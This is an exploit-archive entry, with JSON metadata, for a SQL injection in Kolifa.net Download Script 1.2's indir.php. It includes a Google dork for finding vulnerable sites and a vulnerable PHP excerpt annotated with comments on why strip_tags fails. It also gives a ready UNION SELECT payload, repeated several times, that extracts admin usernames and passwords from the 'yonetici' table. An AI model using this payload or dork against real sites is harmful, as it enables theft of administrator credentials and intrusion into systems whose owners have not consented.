ID 1337DAY-ID-3565
Type zdt
Reporter Kacak
Modified 2008-08-26T00:00:00
Description
Exploit for unknown platform in category web applications
===============================================================
Kolifa.net Download Script 1.2 (id) SQL Injection Vulnerability
===============================================================
Title: Kolifa.Net Download Script (indir.php)
================================================================
[+] Author : Kacak
[+] Special Thankz : Sa0 & Knock0ut & Biyocanlar & BilisimCanlar & All My Friends
[+] http://www.lmfrf.org/kolifanet-download-script-12-sql-injection-vulnerability/2008/08/26/web-script-bug/
=================================================================
Script : Kolifa.Net Download Script
Demo : http://kolifadwn.awardspace.com/down
Google Dork : inurl:prog.php?dwkodu=
Error Code (vulnerable source excerpt) :
<?php
//*****************************
//*****************************
//********** KOLIFA ***********
//********** DOWNLOAD *********
//********** SCRIPT ***********
//*****************************
//****** www.kolifa.net *******
//*****************************
// Bootstrap of the download page: sets error reporting, loads two project
// files, opens the database connection and reads the `id` and `act` request
// parameters. The SQL statement that later consumes $dwkodu is NOT part of
// this excerpt, so the injection sink itself cannot be reviewed from here.

// Report every error level except notices.
ini_set('error_reporting', E_ALL^E_NOTICE);
// include() only warns when the file is missing, so execution continues
// without it. $dbhost, $dbkullanici, $dbsifre and $db are not defined in this
// excerpt; presumably they come from ayarlar.php (verify).
include("ayarlar.php");
// require() is fatal when the file is missing. The contents are not shown.
require('fonksiyon.php');
// Legacy ext/mysql API (removed in PHP 7.0). It offers no prepared statements,
// so any query built from request data depends entirely on manual escaping.
$baglanti = mysql_connect($dbhost,$dbkullanici,$dbsifre) or die("Veritaban?na baglan?lamad?.");
// The result of selecting the database is stored but not checked in this excerpt.
$sec = mysql_select_db($db);
// SECURITY: strip_tags() removes HTML/PHP tags only. It does not escape or
// reject SQL syntax (quotes, comments, UNION ...). The request reported in this
// advisory contains no tags, so it reaches $dwkodu unchanged.
// NOTE(review): if `id` is meant to be a numeric key (the unquoted payload
// suggests so, confirm against the query), validate it as an integer here and
// bind it as a parameter via mysqli or PDO instead of concatenating it into SQL.
$dwkodu=strip_tags($_GET['id']);
// Same tag-only filter as above. How $act is used is not visible in this
// excerpt, so treat it as untrusted wherever it is consumed.
$act=strip_tags($_GET['act']);
?>
---------------------------
Example : http://[Site]/indir.php?id=-1/**/union/**/select/**/concat(admin_adi,0x3a,admin_sifresi)/**/from/**/yonetici/
[<p>Eger Yuklenme Islemi Baslamazsa <a href="Username:Password">Buraya T?klay?n</a></td>]
###############################################################
< -- bug code start -- >
www.site.com/path/indir.php?id=-1/**/union/**/select/**/concat(admin_adi,0x3a,admin_sifresi)/**/from/**/yonetici/*
/path/indir.php?id=-1/**/union/**/select/**/concat(admin_adi,0x3a,admin_sifresi)/**/from/**/yonetici/*
< -- bug code end of -- >
# 0day.today [2018-01-03] #
{"published": "2008-08-26T00:00:00", "id": "1337DAY-ID-3565", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "enchantments": {"score": {"value": 0.7, "vector": "NONE", "modified": "2018-01-03T19:04:58", "rev": 2}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562311220191503"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/GITLIST_ARG_INJECTION", "MSF:AUXILIARY/SCANNER/HTTP/ONION_OMEGA2_LOGIN", "MSF:EXPLOIT/MULTI/HTTP/WP_DB_BACKUP_RCE", "MSF:EXPLOIT/WINDOWS/HTTP/MANAGEENGINE_ADSHACLUSTER_RCE", "MSF:EXPLOIT/WINDOWS/HTTP/OATS_WEBLOGIC_CONSOLE", "MSF:AUXILIARY/SCANNER/HTTP/DICOOGLE_TRAVERSAL", "MSF:EXPLOIT/LINUX/HTTP/IMPERVA_SECURESPHERE_EXEC", "MSF:AUXILIARY/SCANNER/HTTP/WP_ARBITRARY_FILE_DELETION", "MSF:EXPLOIT/MULTI/HTTP/CONFLUENCE_WIDGET_CONNECTOR", "MSF:EXPLOIT/LINUX/HTTP/HP_VAN_SDN_CMD_INJECT"]}, {"type": "nessus", "idList": ["EULEROS_SA-2019-1503.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-31403"]}, {"type": "exploitdb", "idList": ["EDB-ID:45671"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:147456", "PACKETSTORM:149926"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:D1236C309752040951CA6CF70D1EEE69"]}, {"type": "saint", "idList": ["SAINT:4A51F090FB88D7C0687C235D80825104", "SAINT:A9B0B05DC77287BBA5CCE7B14B30EB70"]}, {"type": "seebug", "idList": ["SSV:97269"]}], "modified": "2018-01-03T19:04:58", "rev": 2}, "vulnersScore": 0.7}, "type": "zdt", "lastseen": "2018-01-03T19:04:58", "edition": 2, "title": "Kolifa.net Download Script 1.2 (id) SQL Injection Vulnerability", "href": "https://0day.today/exploit/description/3565", "modified": "2008-08-26T00:00:00", "bulletinFamily": "exploit", "viewCount": 5, "cvelist": [], "sourceHref": "https://0day.today/exploit/3565", "references": [], "reporter": "Kacak", "sourceData": "===============================================================\r\nKolifa.net Download Script 1.2 (id) SQL Injection 
Vulnerability\r\n===============================================================\r\n\r\n\r\n\r\nTitle: Kolifa.Net Download Script (indir.php)\r\n\r\n================================================================\r\n\r\n[+] Author : Kacak\r\n\r\n[+] Special Thankz : Sa0 & Knock0ut & Biyocanlar & BilisimCanlar & All My Friends\r\n\r\n[+] http://www.lmfrf.org/kolifanet-download-script-12-sql-injection-vulnerability/2008/08/26/web-script-bug/\r\n\r\n=================================================================\r\n\r\nScript : Kolifa.Net Download Script\r\n\r\nDemo : http://kolifadwn.awardspace.com/down\r\n\r\nGoogle Dork : inurl:prog.php?dwkodu=\r\n\r\nError Code : \r\n\r\n<?php\r\n//*****************************\r\n//*****************************\r\n//********** KOLIFA ***********\r\n//********** DOWNLOAD *********\r\n//********** SCRIPT ***********\r\n//*****************************\r\n//****** www.kolifa.net *******\r\n//*****************************\r\nini_set('error_reporting', E_ALL^E_NOTICE);\r\ninclude(\"ayarlar.php\");\r\nrequire('fonksiyon.php');\r\n$baglanti = mysql_connect($dbhost,$dbkullanici,$dbsifre) or die(\"Veritaban?na baglan?lamad?.\");\r\n$sec = mysql_select_db($db);\r\n$dwkodu=strip_tags($_GET['id']);\r\n$act=strip_tags($_GET['act']);\r\n?>\r\n\r\n---------------------------\r\n\r\nExample : http://[Site]/indir.php?id=-1/**/union/**/select/**/concat(admin_adi,0x3a,admin_sifresi)/**/from/**/yonetici/\r\n\r\n[<p>Eger Yuklenme Islemi Baslamazsa <a href=\"Username:Password\">Buraya T?klay?n</a></td>]\r\n\r\n\r\n###############################################################\r\n\r\n< -- bug code start -- >\r\n\r\nwww.site.com/path/indir.php?id=-1/**/union/**/select/**/concat(admin_adi,0x3a,admin_sifresi)/**/from/**/yonetici/*\r\n\r\n/path/indir.php?id=-1/**/union/**/select/**/concat(admin_adi,0x3a,admin_sifresi)/**/from/**/yonetici/*\r\n\r\n< -- bug code end of -- >\r\n\r\n\r\n\n# 0day.today [2018-01-03] #"}
{}